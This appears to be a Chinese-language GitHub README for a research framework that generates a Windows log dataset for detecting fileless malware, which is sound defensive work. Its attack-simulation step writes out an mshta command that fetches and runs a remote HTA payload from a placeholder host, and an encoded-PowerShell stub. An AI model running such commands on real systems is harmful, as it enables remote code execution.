Shyleda/Log-Based-Fileless-Malware-Detection

# 基于日志的无文件恶意软件检测 本仓库提出了一个通过 Windows Event Logs 静态分析来检测无文件恶意软件的研究型框架。与传统的基于特征码的方法不同，这项工作侧重于从系统遥测数据（如 Sysmon 和 PowerShell 日志）中提取的行为指标。 # 🛡️ 无文件恶意软件检测数据集生成框架 本仓库介绍了用于生成自定义数据集以利用 Windows Event Logs 和 Sysmon 遥测技术检测无文件恶意软件的方法。该数据集是在受控的虚拟化环境中通过模拟良性活动和恶意活动创建的，确保了在没有使用实际恶意软件的情况下进行真实的行为表示。 ## 📌 概述 - **日志总条目：** 2101 - **良性日志：** 1206 - **恶意日志：** 895 - **训练集：** 30% - **测试集：** 70% ## 🖥️ 方法论 ### 步骤 1：环境设置 使用 VirtualBox 或 VMware 搭建了 Windows 10/11（64 位）的安全虚拟实验室环境。虚拟化的使用确保了攻击模拟的安全执行和结果的可复现性。 ### 步骤 2：启用日志记录 使用 Sysmon 启用了系统监控，Sysmon 是一项 Windows 系统服务，用于记录详细的系统活动。 下载 Sysmon： https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon 安装： powershell sysmon -accepteula -i sysmonconfig.xml 启用 PowerShell 日志记录： Set-ExecutionPolicy RemoteSigned Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 ### 步骤 3：生成良性活动日志 模拟正常用户活动以生成良性日志，包括： Web 浏览（Chrome、Edge） 文件操作（复制、移动、删除） 打开标准应用程序（记事本、计算器） 运行系统实用程序 这些操作是在多个会话中执行的，以确保良性日志数据的多样性。 ### 步骤 4：模拟无文件恶意软件攻击 执行受控的无文件攻击技术以生成恶意日志： 🔹 PowerShell 编码命令 powershell -enc 🔹 LOLBins 滥用 mshta http://example.com/payload.hta 🔹 可疑进程链 winword.exe → powershell.exe explorer.exe → cmd.exe → powershell.exe 这些模拟模仿了现实世界的对抗技术，而无需部署实际的恶意软件。 ### 步骤 5：日志收集 日志通过以下方式收集： Event Viewer Sysmon 日志 导出日志： wevtutil epl Microsoft-Windows-Sysmon/Operational sysmon_logs.evtx ### 步骤 6：日志解析与特征提取 使用 Python 解析日志以提取相关特征，例如： Event ID 进程名称 父进程 命令行参数 网络活动 示例： import pandas as pd df = pd.read_csv("logs.csv") features = df[["EventID", "ProcessName", "CommandLine"]] ### 步骤 7：标记数据集 每个日志条目均被标记： 0 → Benign (良性) 1 → Malicious (恶意) 标记是根据已知的攻击模式和模拟时间戳完成的。 ### 步骤 8：数据集划分 数据集被划分为： 训练/校准集：30% 测试集：70% 示例： from sklearn.model_selection import train_test_split train, test = train_test_split(df, test_size=0.7, random_state=42)

标签：AI合规, Caido项目解析, EDR, PowerShell日志, Sysmon, Windows事件日志, 事件日志分析, 云安全监控, 后渗透, 攻击模拟, 数据集生成, 无文件恶意软件检测, 无线安全, 机器学习数据集, 流量嗅探, 系统遥测, 网络安全, 网络安全审计, 网络设备安全, 脆弱性评估, 虚拟化环境, 逆向工具, 隐私保护, 静态分析, 驱动签名利用